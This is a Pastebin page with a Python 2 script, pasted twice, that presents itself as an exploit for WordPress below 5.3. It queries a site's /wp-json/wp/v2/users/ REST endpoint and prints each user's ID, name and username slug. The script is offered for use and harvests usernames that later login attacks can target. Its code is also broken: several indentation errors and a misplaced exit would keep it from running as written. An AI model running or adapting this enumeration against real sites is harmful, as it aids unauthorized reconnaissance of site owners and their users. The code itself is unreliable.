Advertisement
RedBirdTeam

Exploit Wordpress 5.3 - User Disclosure

Nov 29th, 2019
1,338
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.49 KB | None | 0 0
  1. # Exploit Title : Wordpress 5.3 - User Disclosure
  2. # Author: SajjadBnd
  3. # Date: 2019-11-17
  4. # Software Link: https://wordpress.org/download/
  5. # version : wp < 5.3
  6. # tested on : Ubunutu 18.04 / python 2.7
  7. # CVE: N/A
  8.  
  9.  
  10. #!/usr/bin/python
  11. # -*- coding: utf-8 -*-
  12. #
  13.  
  14.  
  15. import requests
  16. import os
  17. import re
  18. import json
  19. import sys
  20. import urllib3
  21.  
  22. def clear():
  23.     linux = 'clear'
  24.     windows = 'cls'
  25.     os.system([linux, windows][os.name == 'nt'])
  26. def Banner():
  27.         print('''
  28. - Wordpress < 5.3 - User Enumeration
  29. - SajjadBnd
  30. ''')
  31. def Desc():
  32.     url = raw_input('[!] Url >> ')
  33.     vuln = url + "/wp-json/wp/v2/users/"
  34.     while True:
  35.         try:
  36.             r = requests.get(vuln,verify=False)
  37.             content = json.loads(r.text)
  38.             data(content)
  39.         except requests.exceptions.MissingSchema:
  40.         vuln = "http://" + vuln
  41. def data(content):
  42.     for x in content:
  43.     name = x["name"].encode('UTF-8')
  44.     print("======================")
  45.     print("[+] ID : " + str(x["id"]))
  46.     print("[+] Name : " + name)
  47.     print("[+] User : " + x["slug"])
  48.     sys.exit(1)
  49. if __name__ == '__main__':
  50.     urllib3.disable_warnings()
  51.     reload(sys)
  52.     sys.setdefaultencoding('UTF8')
  53.     clear()
  54.     Banner()
  55.     Desc()
  56.  
  57. wpuser.txt
  58.  
  59. #!/usr/bin/python
  60. # -*- coding: utf-8 -*-
  61. #
  62. # Exploit Title : Wordpress < 5.3 - User Disclosure
  63. # Exploit Author: SajjadBnd
  64. # Software Link: https://wordpress.org/download/
  65. # version : wp < 5.3
  66. # tested on : Ubunutu 18.04 / python 2.7
  67.  
  68. import requests
  69. import os
  70. import re
  71. import json
  72. import sys
  73. import urllib3
  74.  
  75. def clear():
  76.     linux = 'clear'
  77.     windows = 'cls'
  78.     os.system([linux, windows][os.name == 'nt'])
  79.  
  80. def Banner():
  81.         print('''
  82. - Wordpress < 5.3 - User Enumeration
  83. - SajjadBnd
  84. ''')
  85.  
  86. def Desc():
  87.     url = raw_input('[!] Url >> ')
  88.     vuln = url + "/wp-json/wp/v2/users/"
  89.     while True:
  90.         try:
  91.             r = requests.get(vuln,verify=False)
  92.             content = json.loads(r.text)
  93.             data(content)
  94.         except requests.exceptions.MissingSchema:
  95.         vuln = "http://" + vuln
  96.  
  97. def data(content):
  98.     for x in content:
  99.     name = x["name"].encode('UTF-8')
  100.     print("======================")
  101.     print("[+] ID : " + str(x["id"]))
  102.     print("[+] Name : " + name)
  103.     print("[+] User : " + x["slug"])
  104.     sys.exit(1)
  105. if __name__ == '__main__':
  106.     urllib3.disable_warnings()
  107.     reload(sys)
  108.     sys.setdefaultencoding('UTF8')
  109.     clear()
  110.     Banner()
  111.     Desc()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement